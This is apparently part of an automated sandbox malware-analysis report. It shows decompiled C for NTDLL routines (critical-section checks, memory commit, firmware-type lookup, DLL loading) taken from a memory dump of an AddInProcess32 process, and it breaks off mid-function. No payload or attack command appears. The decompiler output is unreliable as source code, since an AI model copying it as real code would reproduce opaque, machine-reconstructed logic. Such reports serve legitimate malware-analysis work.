                              • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 018EFF60
                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID: DebugPrintTimes
                              • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                              • API String ID: 3446177414-1911121157
                              • Opcode ID: d20345f98a82d03e3ef3ee28060233936361b9b5ce6df9d1ad935939d68ee3d1
                              • Instruction ID: 51a23791c6aaf7c9966083425a10c12db5c1023871d6a9fa7870fc52ae24f5fa
                              • Opcode Fuzzy Hash: d20345f98a82d03e3ef3ee28060233936361b9b5ce6df9d1ad935939d68ee3d1
                              • Instruction Fuzzy Hash: A511E175950548EFEB26EB98C848F98BBF1BB09704F548054E208E76A1CB389A40CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 60%
                              			E0191E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                              				signed int _v20;
                              				char _v24;
                              				signed int _v40;
                              				char _v44;
                              				intOrPtr _v48;
                              				signed int _v52;
                              				unsigned int _v56;
                              				char _v60;
                              				signed int _v64;
                              				char _v68;
                              				signed int _v72;
                              				void* __ebx;
                              				void* __edi;
                              				char _t87;
                              				signed int _t90;
                              				signed int _t94;
                              				signed int _t100;
                              				intOrPtr* _t113;
                              				signed int _t122;
                              				void* _t132;
                              				void* _t135;
                              				signed int _t139;
                              				signed int* _t141;
                              				signed int _t146;
                              				signed int _t147;
                              				void* _t153;
                              				signed int _t155;
                              				signed int _t159;
                              				char _t166;
                              				void* _t172;
                              				void* _t176;
                              				signed int _t177;
                              				intOrPtr* _t179;
                              
                              				_t179 = __ecx;
                              				_v48 = __edx;
                              				_v68 = 0;
                              				_v72 = 0;
                              				_push(__ecx[1]);
                              				_push( *__ecx);
                              				_push(0);
                              				_t153 = 0x14;
                              				_t135 = _t153;
                              				_t132 = E0191BBBB(_t135, _t153);
                              				if(_t132 == 0) {
                              					_t166 = _v68;
                              					goto L43;
                              				} else {
                              					_t155 = 0;
                              					_v52 = 0;
                              					asm("stosd");
                              					asm("stosd");
                              					asm("stosd");
                              					asm("stosd");
                              					asm("stosd");
                              					_v56 = __ecx[1];
                              					if( *__ecx >> 8 < 2) {
                              						_t155 = 1;
                              						_v52 = 1;
                              					}
                              					_t139 = _a4;
                              					_t87 = (_t155 << 0xc) + _t139;
                              					_v60 = _t87;
                              					if(_t87 < _t139) {
                              						L11:
                              						_t166 = _v68;
                              						L12:
                              						if(_t132 != 0) {
                              							E0191BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                              						}
                              						L43:
                              						if(_v72 != 0) {
                              							_push( *((intOrPtr*)(_t179 + 4)));
                              							_push( *_t179);
                              							_push(0x8000);
                              							E0191AFDE( &_v72,  &_v60);
                              						}
                              						L46:
                              						return _t166;
                              					}
                              					_t90 =  *(_t179 + 0xc) & 0x40000000;
                              					asm("sbb edi, edi");
                              					_t172 = ( ~_t90 & 0x0000003c) + 4;
                              					if(_t90 != 0) {
                              						_push(0);
                              						_push(0x14);
                              						_push( &_v44);
                              						_push(3);
                              						_push(_t179);
                              						_push(0xffffffff);
                              						if(E01899730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                              							_push(_t139);
                              							E0191A80D(_t179, 1, _v40, 0);
                              							_t172 = 4;
                              						}
                              					}
                              					_t141 =  &_v72;
                              					if(E0191A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                              						_v64 = _a4;
                              						_t94 =  *(_t179 + 0xc) & 0x40000000;
                              						asm("sbb edi, edi");
                              						_t176 = ( ~_t94 & 0x0000003c) + 4;
                              						if(_t94 != 0) {
                              							_push(0);
                              							_push(0x14);
                              							_push( &_v24);
                              							_push(3);
                              							_push(_t179);
                              							_push(0xffffffff);
                              							if(E01899730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                              								_push(_t141);
                              								E0191A80D(_t179, 1, _v20, 0);
                              								_t176 = 4;
                              							}
                              						}
                              						if(E0191A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                              							goto L11;
                              						} else {
                              							_t177 = _v64;
                              							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                              							_t100 = _v52 + _v52;
                              							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                              							 *(_t132 + 0x10) = _t146;
                              							asm("bsf eax, [esp+0x18]");
                              							_v52 = _t100;
                              							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                              							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                              							_t47 =  &_a8;
                              							 *_t47 = _a8 & 0x00000001;
                              							if( *_t47 == 0) {
                              								E01872280(_t179 + 0x30, _t179 + 0x30);
                              							}
                              							_t147 =  *(_t179 + 0x34);
                              							_t159 =  *(_t179 + 0x38) & 1;
                              							_v68 = 0;
                              							if(_t147 == 0) {
                              								L35:
                              								E0186B090(_t179 + 0x34, _t147, _v68, _t132);
                              								if(_a8 == 0) {
                              									E0186FFB0(_t132, _t177, _t179 + 0x30);
                              								}
                              								asm("lock xadd [eax], ecx");
                              								asm("lock xadd [eax], edx");
                              								_t132 = 0;
                              								_v72 = _v72 & 0;
                              								_v68 = _v72;
                              								if(E01877D50() == 0) {
                              									_t113 = 0x7ffe0388;
                              								} else {
                              									_t177 = _v64;
                              									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                              								}
                              								if( *_t113 == _t132) {
                              									_t166 = _v68;
                              									goto L46;
                              								} else {
                              									_t166 = _v68;
                              									E0190FEC0(_t132, _t179, _t166, _t177 + 0x1000);
                              									goto L12;
                              								}
                              							} else {
                              								L23:
                              								while(1) {
                              									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                              										_t122 =  *_t147;
                              										if(_t159 == 0) {
                              											L32:
                              											if(_t122 == 0) {
                              												L34:
                              												_v68 = 0;
                              												goto L35;
                              											}
                              											L33:
                              											_t147 = _t122;
                              											continue;
                              										}
                              										if(_t122 == 0) {
                              											goto L34;
                              										}
                              										_t122 = _t122 ^ _t147;
                              										goto L32;
                              									}
                              									_t122 =  *(_t147 + 4);
                              									if(_t159 == 0) {
                              										L27:
                              										if(_t122 != 0) {
                              											goto L33;
                              										}
                              										L28:
                              										_v68 = 1;
                              										goto L35;
                              									}
                              									if(_t122 == 0) {
                              										goto L28;
                              									}
                              									_t122 = _t122 ^ _t147;
                              									goto L27;
                              								}
                              							}
                              						}
                              					}
                              					_v72 = _v72 & 0x00000000;
                              					goto L11;
                              				}
                              			}





































                              Strings
                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID: `$`
                              • API String ID: 0-197956300
                              • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                              • Instruction ID: 05bd713e0f8c1b43158e6809ec85bb3ed8137c110e98fc28fcee8ca1d2298712
                              • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                              • Instruction Fuzzy Hash: 5191B3316043469FE726CE29C940B1BBBE9AFC4714F14892DFA99C7284E770E944CB52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 77%
                              			E018D51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                              				signed short* _t63;
                              				signed int _t64;
                              				signed int _t65;
                              				signed int _t67;
                              				intOrPtr _t74;
                              				intOrPtr _t84;
                              				intOrPtr _t88;
                              				intOrPtr _t94;
                              				void* _t100;
                              				void* _t103;
                              				intOrPtr _t105;
                              				signed int _t106;
                              				short* _t108;
                              				signed int _t110;
                              				signed int _t113;
                              				signed int* _t115;
                              				signed short* _t117;
                              				void* _t118;
                              				void* _t119;
                              
                              				_push(0x80);
                              				_push(0x19305f0);
                              				E018AD0E8(__ebx, __edi, __esi);
                              				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                              				_t115 =  *(_t118 + 0xc);
                              				 *(_t118 - 0x7c) = _t115;
                              				 *((char*)(_t118 - 0x65)) = 0;
                              				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                              				_t113 = 0;
                              				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                              				 *((intOrPtr*)(_t118 - 4)) = 0;
                              				_t100 = __ecx;
                              				if(_t100 == 0) {
                              					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                              					E0186EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                              					 *((char*)(_t118 - 0x65)) = 1;
                              					_t63 =  *(_t118 - 0x90);
                              					_t101 = _t63[2];
                              					_t64 =  *_t63 & 0x0000ffff;
                              					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                              					L20:
                              					_t65 = _t64 >> 1;
                              					L21:
                              					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                              					if(_t108 == 0) {
                              						L27:
                              						 *_t115 = _t65 + 1;
                              						_t67 = 0xc0000023;
                              						L28:
                              						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                              						L29:
                              						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                              						E018D53CA(0);
                              						return E018AD130(0, _t113, _t115);
                              					}
                              					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                              						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                              							 *_t108 = 0;
                              						}
                              						goto L27;
                              					}
                              					 *_t115 = _t65;
                              					_t115 = _t65 + _t65;
                              					E0189F3E0(_t108, _t101, _t115);
                              					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                              					_t67 = 0;
                              					goto L28;
                              				}
                              				_t103 = _t100 - 1;
                              				if(_t103 == 0) {
                              					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                              					_t74 = E01873690(1, _t117, 0x1831810, _t118 - 0x74);
                              					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                              					_t101 = _t117[2];
                              					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                              					if(_t74 < 0) {
                              						_t64 =  *_t117 & 0x0000ffff;
                              						_t115 =  *(_t118 - 0x7c);
                              						goto L20;
                              					}
                              					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                              					_t115 =  *(_t118 - 0x7c);
                              					goto L21;
                              				}
                              				if(_t103 == 1) {
                              					_t105 = 4;
                              					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                              					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                              					_push(_t118 - 0x70);
                              					_push(0);
                              					_push(0);
                              					_push(_t105);
                              					_push(_t118 - 0x78);
                              					_push(0x6b);
                              					 *((intOrPtr*)(_t118 - 0x64)) = E0189AA90();
                              					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                              					_t113 = L01874620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                              					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                              					if(_t113 != 0) {
                              						_push(_t118 - 0x70);
                              						_push( *((intOrPtr*)(_t118 - 0x70)));
                              						_push(_t113);
                              						_push(4);
                              						_push(_t118 - 0x78);
                              						_push(0x6b);
                              						_t84 = E0189AA90();
                              						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                              						if(_t84 < 0) {
                              							goto L29;
                              						}
                              						_t110 = 0;
                              						_t106 = 0;
                              						while(1) {
                              							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                              							 *(_t118 - 0x88) = _t106;
                              							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                              								break;
                              							}
                              							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                              							_t106 = _t106 + 1;
                              						}
                              						_t88 = E018D500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                              						_t119 = _t119 + 0x1c;
                              						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                              						if(_t88 < 0) {
                              							goto L29;
                              						}
                              						_t101 = _t118 - 0x3c;
                              						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                              						goto L21;
                              					}
                              					_t67 = 0xc0000017;
                              					goto L28;
                              				}
                              				_push(0);
                              				_push(0x20);
                              				_push(_t118 - 0x60);
                              				_push(0x5a);
                              				_t94 = E01899860();
                              				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                              				if(_t94 < 0) {
                              					goto L29;
                              				}
                              				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                              					_t101 = L"Legacy";
                              					_push(6);
                              				} else {
                              					_t101 = L"UEFI";
                              					_push(4);
                              				}
                              				_pop(_t65);
                              				goto L21;
                              			}























                              Strings
                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID: Legacy$UEFI
                              • API String ID: 2994545307-634100481
                              • Opcode ID: 71c79e96267c2ef71b4ce1b9f632ef506e5381d71d6e9a19a0dae0b4997f4514
                              • Instruction ID: 3675f3238895b4025b77706bb252707f63cca9a0d7aa466b1f041bc3fde74b5c
                              • Opcode Fuzzy Hash: 71c79e96267c2ef71b4ce1b9f632ef506e5381d71d6e9a19a0dae0b4997f4514
                              • Instruction Fuzzy Hash: 00516F71A007099FDB19DFA9C840AADBBF8FF55704F14402EE659EB251DB71DA00CB51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 87%
                              			E0186D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
                              				signed int _v8;
                              				intOrPtr _v20;
                              				signed int _v36;
                              				intOrPtr* _v40;
                              				signed int _v44;
                              				signed int _v48;
                              				signed char _v52;
                              				signed int _v60;
                              				signed int _v64;
                              				signed int _v68;
                              				signed int _v72;
                              				signed int _v76;
                              				intOrPtr _v80;
                              				signed int _v84;
                              				intOrPtr _v100;
                              				intOrPtr _v104;
                              				signed int _v108;
                              				signed int _v112;
                              				signed int _v116;
                              				intOrPtr _v120;
                              				signed int _v132;
                              				char _v140;
                              				char _v144;
                              				char _v157;
                              				signed int _v164;
                              				signed int _v168;
                              				signed int _v169;
                              				intOrPtr _v176;
                              				signed int _v180;
                              				signed int _v184;
                              				intOrPtr _v188;
                              				signed int _v192;
                              				signed int _v200;
                              				signed int _v208;
                              				intOrPtr* _v212;
                              				char _v216;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* __ebp;
                              				signed int _t204;
                              				signed int _t206;
                              				void* _t208;
                              				signed int _t211;
                              				signed int _t216;
                              				intOrPtr _t217;
                              				intOrPtr* _t218;
                              				signed int _t226;
                              				signed int _t239;
                              				signed int* _t247;
                              				signed int _t249;
                              				void* _t252;
                              				signed int _t256;
                              				signed int _t269;
                              				signed int _t271;
                              				signed int _t277;
                              				signed int _t279;
                              				intOrPtr _t283;
                              				signed int _t287;
                              				signed int _t288;
                              				void* _t289;
                              				signed char _t290;
                              				signed int _t292;
                              				signed int* _t293;
                              				unsigned int _t297;
                              				signed int _t306;
                              				signed int _t307;
                              				signed int _t308;
                              				signed int _t309;
                              				signed int _t310;
                              				intOrPtr _t311;
                              				intOrPtr _t312;
                              				signed int _t319;
                              				signed int _t320;
                              				signed int* _t324;
                              				signed int _t337;
                              				signed int _t338;
                              				signed int _t339;
                              				signed int* _t340;
                              				void* _t341;
                              				signed int _t344;
                              				signed int _t348;
                              				signed int _t349;
                              				signed int _t351;
                              				intOrPtr _t353;
                              				void* _t354;
                              				signed int _t356;
                              				signed int _t358;
                              				intOrPtr _t359;
                              				signed int _t361;
                              				signed int _t363;
                              				signed short* _t365;
                              				void* _t367;
                              				intOrPtr _t369;
                              				void* _t370;
                              				signed int _t371;
                              				signed int _t372;
                              				void* _t374;
                              				signed int _t376;
                              				void* _t384;
                              				signed int _t387;
                              
                              				_v8 =  *0x194d360 ^ _t376;
                              				_t2 =  &_a20;
                              				 *_t2 = _a20 & 0x00000001;
                              				_t287 = _a4;
                              				_v200 = _a12;
                              				_t365 = _a8;
                              				_v212 = _a16;
                              				_v180 = _a24;
                              				_v168 = 0;
                              				_v157 = 0;
                              				if( *_t2 != 0) {
                              					__eflags = E01866600(0x19452d8);
                              					if(__eflags == 0) {
                              						goto L1;
                              					} else {
                              						_v188 = 6;
                              					}
                              				} else {
                              					L1:
                              					_v188 = 9;
                              				}
                              				if(_t365 == 0) {
                              					_v164 = 0;
                              					goto L5;
                              				} else {
                              					_t363 =  *_t365 & 0x0000ffff;
                              					_t341 = _t363 + 1;
                              					if((_t365[1] & 0x0000ffff) < _t341) {
                              						L109:
                              						__eflags = _t341 - 0x80;
                              						if(_t341 <= 0x80) {
                              							_t281 =  &_v140;
                              							_v164 =  &_v140;
                              							goto L114;
                              						} else {
                              							_t283 =  *0x1947b9c; // 0x0
                              							_t281 = L01874620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
                              							_v164 = _t281;
                              							__eflags = _t281;
                              							if(_t281 != 0) {
                              								_v157 = 1;
                              								L114:
                              								E0189F3E0(_t281, _t365[2], _t363);
                              								_t200 = _v164;
                              								 *((char*)(_v164 + _t363)) = 0;
                              								goto L5;
                              							} else {
                              								_t204 = 0xc000009a;
                              								goto L47;
                              							}
                              						}
                              					} else {
                              						_t200 = _t365[2];
                              						_v164 = _t200;
                              						if( *((char*)(_t200 + _t363)) != 0) {
                              							goto L109;
                              						} else {
                              							while(1) {
                              								L5:
                              								_t353 = 0;
                              								_t342 = 0x1000;
                              								_v176 = 0;
                              								if(_t287 == 0) {
                              									break;
                              								}
                              								_t384 = _t287 -  *0x1947b90; // 0x77880000
                              								if(_t384 == 0) {
                              									_t353 =  *0x1947b8c; // 0x12e2ab8
                              									_v176 = _t353;
                              									_t320 = ( *(_t353 + 0x50))[8];
                              									_v184 = _t320;
                              								} else {
                              									E01872280(_t200, 0x19484d8);
                              									_t277 =  *0x19485f4; // 0x12e2fa8
                              									_t351 =  *0x19485f8 & 1;
                              									while(_t277 != 0) {
                              										_t337 =  *(_t277 - 0x50);
                              										if(_t337 > _t287) {
                              											_t338 = _t337 | 0xffffffff;
                              										} else {
                              											asm("sbb ecx, ecx");
                              											_t338 =  ~_t337;
                              										}
                              										_t387 = _t338;
                              										if(_t387 < 0) {
                              											_t339 =  *_t277;
                              											__eflags = _t351;
                              											if(_t351 != 0) {
                              												__eflags = _t339;
                              												if(_t339 == 0) {
                              													goto L16;
                              												} else {
                              													goto L118;
                              												}
                              												goto L151;
                              											} else {
                              												goto L16;
                              											}
                              											goto L17;
                              										} else {
                              											if(_t387 <= 0) {
                              												__eflags = _t277;
                              												if(_t277 != 0) {
                              													_t340 =  *(_t277 - 0x18);
                              													_t24 = _t277 - 0x68; // 0x12e2f40
                              													_t353 = _t24;
                              													_v176 = _t353;
                              													__eflags = _t340[3] - 0xffffffff;
                              													if(_t340[3] != 0xffffffff) {
                              														_t279 =  *_t340;
                              														__eflags =  *(_t279 - 0x20) & 0x00000020;
                              														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
                              															asm("lock inc dword [edi+0x9c]");
                              															_t340 =  *(_t353 + 0x50);
                              														}
                              													}
                              													_v184 = _t340[8];
                              												}
                              											} else {
                              												_t339 =  *(_t277 + 4);
                              												if(_t351 != 0) {
                              													__eflags = _t339;
                              													if(_t339 == 0) {
                              														goto L16;
                              													} else {
                              														L118:
                              														_t277 = _t277 ^ _t339;
                              														goto L17;
                              													}
                              													goto L151;
                              												} else {
                              													L16:
                              													_t277 = _t339;
                              												}
                              												goto L17;
                              											}
                              										}
                              										goto L25;
                              										L17:
                              									}
                              									L25:
                              									E0186FFB0(_t287, _t353, 0x19484d8);
                              									_t320 = _v184;
                              									_t342 = 0x1000;
                              								}
                              								if(_t353 == 0) {
                              									break;
                              								} else {
                              									_t366 = 0;
                              									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
                              										_t288 = _v164;
                              										if(_t353 != 0) {
                              											_t342 = _t288;
                              											_t374 = E018ACC99(_t353, _t288, _v200, 1,  &_v168);
                              											if(_t374 >= 0) {
                              												if(_v184 == 7) {
                              													__eflags = _a20;
                              													if(__eflags == 0) {
                              														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
                              														if(__eflags != 0) {
                              															_t271 = E01866600(0x19452d8);
                              															__eflags = _t271;
                              															if(__eflags == 0) {
                              																_t342 = 0;
                              																_v169 = _t271;
                              																_t374 = E01867926( *(_t353 + 0x50), 0,  &_v169);
                              															}
                              														}
                              													}
                              												}
                              												if(_t374 < 0) {
                              													_v168 = 0;
                              												} else {
                              													if( *0x194b239 != 0) {
                              														_t342 =  *(_t353 + 0x18);
                              														E018DE974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
                              													}
                              													if( *0x1948472 != 0) {
                              														_v192 = 0;
                              														_t342 =  *0x7ffe0330;
                              														_t361 =  *0x194b218; // 0x0
                              														asm("ror edi, cl");
                              														 *0x194b1e0( &_v192, _t353, _v168, 0, _v180);
                              														 *(_t361 ^  *0x7ffe0330)();
                              														_t269 = _v192;
                              														_t353 = _v176;
                              														__eflags = _t269;
                              														if(__eflags != 0) {
                              															_v168 = _t269;
                              														}
                              													}
                              												}
                              											}
                              											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
                              												_t366 = 0xc000007a;
                              											}
                              											_t247 =  *(_t353 + 0x50);
                              											if(_t247[3] == 0xffffffff) {
                              												L40:
                              												if(_t366 == 0xc000007a) {
                              													__eflags = _t288;
                              													if(_t288 == 0) {
                              														goto L136;
                              													} else {
                              														_t366 = 0xc0000139;
                              													}
                              													goto L54;
                              												}
                              											} else {
                              												_t249 =  *_t247;
                              												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
                              													goto L40;
                              												} else {
                              													_t250 = _t249 | 0xffffffff;
                              													asm("lock xadd [edi+0x9c], eax");
                              													if((_t249 | 0xffffffff) == 0) {
                              														E01872280(_t250, 0x19484d8);
                              														_t342 =  *(_t353 + 0x54);
                              														_t165 = _t353 + 0x54; // 0x54
                              														_t252 = _t165;
                              														__eflags =  *(_t342 + 4) - _t252;
                              														if( *(_t342 + 4) != _t252) {
                              															L135:
                              															asm("int 0x29");
                              															L136:
                              															_t288 = _v200;
                              															_t366 = 0xc0000138;
                              															L54:
                              															_t342 = _t288;
                              															L01893898(0, _t288, _t366);
                              														} else {
                              															_t324 =  *(_t252 + 4);
                              															__eflags =  *_t324 - _t252;
                              															if( *_t324 != _t252) {
                              																goto L135;
                              															} else {
                              																 *_t324 = _t342;
                              																 *(_t342 + 4) = _t324;
                              																_t293 =  *(_t353 + 0x50);
                              																_v180 =  *_t293;
                              																E0186FFB0(_t293, _t353, 0x19484d8);
                              																__eflags =  *((short*)(_t353 + 0x3a));
                              																if( *((short*)(_t353 + 0x3a)) != 0) {
                              																	_t342 = 0;
                              																	__eflags = 0;
                              																	E018937F5(_t353, 0);
                              																}
                              																E01890413(_t353);
                              																_t256 =  *(_t353 + 0x48);
                              																__eflags = _t256;
                              																if(_t256 != 0) {
                              																	__eflags = _t256 - 0xffffffff;
                              																	if(_t256 != 0xffffffff) {
                              																		E01889B10(_t256);
                              																	}
                              																}
                              																__eflags =  *(_t353 + 0x28);
                              																if( *(_t353 + 0x28) != 0) {
                              																	_t174 = _t353 + 0x24; // 0x24
                              																	E018802D6(_t174);
                              																}
                              																L018777F0( *0x1947b98, 0, _t353);
                              																__eflags = _v180 - _t293;
                              																if(__eflags == 0) {
                              																	E0188C277(_t293, _t366);
                              																}
                              																_t288 = _v164;
                              																goto L40;
                              															}
                              														}
                              													} else {
                              														goto L40;
                              													}
                              												}
                              											}
                              										}
                              									} else {
                              										L0186EC7F(_t353);
                              										L018819B8(_t287, 0, _t353, 0);
                              										_t200 = E0185F4E3(__eflags);
                              										continue;
                              									}
                              								}
                              								L41:
                              								if(_v157 != 0) {
                              									L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
                              								}
                              								if(_t366 < 0) {
                              									L46:
                              									 *_v212 = _v168;
                              									_t204 = _t366;
                              									L47:
                              									_pop(_t354);
                              									_pop(_t367);
                              									_pop(_t289);
                              									return E0189B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
                              								} else {
                              									_t206 =  *0x194b2f8; // 0x0
                              									if((_t206 |  *0x194b2fc) == 0 || ( *0x194b2e4 & 0x00000001) != 0) {
                              										goto L46;
                              									} else {
                              										_t297 =  *0x194b2ec; // 0x0
                              										_v200 = 0;
                              										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
                              											_t355 = _v168;
                              											_t342 =  &_v208;
                              											_t208 = E01906B68(_v168,  &_v208, _v168, __eflags);
                              											__eflags = _t208 - 1;
                              											if(_t208 == 1) {
                              												goto L46;
                              											} else {
                              												__eflags = _v208 & 0x00000010;
                              												if((_v208 & 0x00000010) == 0) {
                              													goto L46;
                              												} else {
                              													_t342 = 4;
                              													_t366 = E01906AEB(_t355, 4,  &_v216);
                              													__eflags = _t366;
                              													if(_t366 >= 0) {
                              														goto L46;
                              													} else {
                              														asm("int 0x29");
                              														_t356 = 0;
                              														_v44 = 0;
                              														_t290 = _v52;
                              														__eflags = 0;
                              														if(0 == 0) {
                              															L108:
                              															_t356 = 0;
                              															_v44 = 0;
                              															goto L63;
                              														} else {
                              															__eflags = 0;
                              															if(0 < 0) {
                              																goto L108;
                              															}
                              															L63:
                              															_v112 = _t356;
                              															__eflags = _t356;
                              															if(_t356 == 0) {
                              																L143:
                              																_v8 = 0xfffffffe;
                              																_t211 = 0xc0000089;
                              															} else {
                              																_v36 = 0;
                              																_v60 = 0;
                              																_v48 = 0;
                              																_v68 = 0;
                              																_v44 = _t290 & 0xfffffffc;
                              																E0186E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
                              																_t306 = _v68;
                              																__eflags = _t306;
                              																if(_t306 == 0) {
                              																	_t216 = 0xc000007b;
                              																	_v36 = 0xc000007b;
                              																	_t307 = _v60;
                              																} else {
                              																	__eflags = _t290 & 0x00000001;
                              																	if(__eflags == 0) {
                              																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
                              																		__eflags = _t349 - 0x10b;
                              																		if(_t349 != 0x10b) {
                              																			__eflags = _t349 - 0x20b;
                              																			if(_t349 == 0x20b) {
                              																				goto L102;
                              																			} else {
                              																				_t307 = 0;
                              																				_v48 = 0;
                              																				_t216 = 0xc000007b;
                              																				_v36 = 0xc000007b;
                              																				goto L71;
                              																			}
                              																		} else {
                              																			L102:
                              																			_t307 =  *(_t306 + 0x50);
                              																			goto L69;
                              																		}
                              																		goto L151;
                              																	} else {
                              																		_t239 = L0186EAEA(_t290, _t290, _t356, _t366, __eflags);
                              																		_t307 = _t239;
                              																		_v60 = _t307;
                              																		_v48 = _t307;
                              																		__eflags = _t307;
                              																		if(_t307 != 0) {
                              																			L70:
                              																			_t216 = _v36;
                              																		} else {
                              																			_push(_t239);
                              																			_push(0x14);
                              																			_push( &_v144);
                              																			_push(3);
                              																			_push(_v44);
                              																			_push(0xffffffff);
                              																			_t319 = E01899730();
                              																			_v36 = _t319;
                              																			__eflags = _t319;
                              																			if(_t319 < 0) {
                              																				_t216 = 0xc000001f;
                              																				_v36 = 0xc000001f;
                              																				_t307 = _v60;
                              																			} else {
                              																				_t307 = _v132;
                              																				L69:
                              																				_v48 = _t307;
                              																				goto L70;
                              																			}
                              																		}
                              																	}
                              																}
                              																L71:
                              																_v72 = _t307;
                              																_v84 = _t216;
                              																__eflags = _t216 - 0xc000007b;
                              																if(_t216 == 0xc000007b) {
                              																	L150:
                              																	_v8 = 0xfffffffe;
                              																	_t211 = 0xc000007b;
                              																} else {
                              																	_t344 = _t290 & 0xfffffffc;
                              																	_v76 = _t344;
                              																	__eflags = _v40 - _t344;
                              																	if(_v40 <= _t344) {
                              																		goto L150;
                              																	} else {
                              																		__eflags = _t307;
                              																		if(_t307 == 0) {
                              																			L75:
                              																			_t217 = 0;
                              																			_v104 = 0;
                              																			__eflags = _t366;
                              																			if(_t366 != 0) {
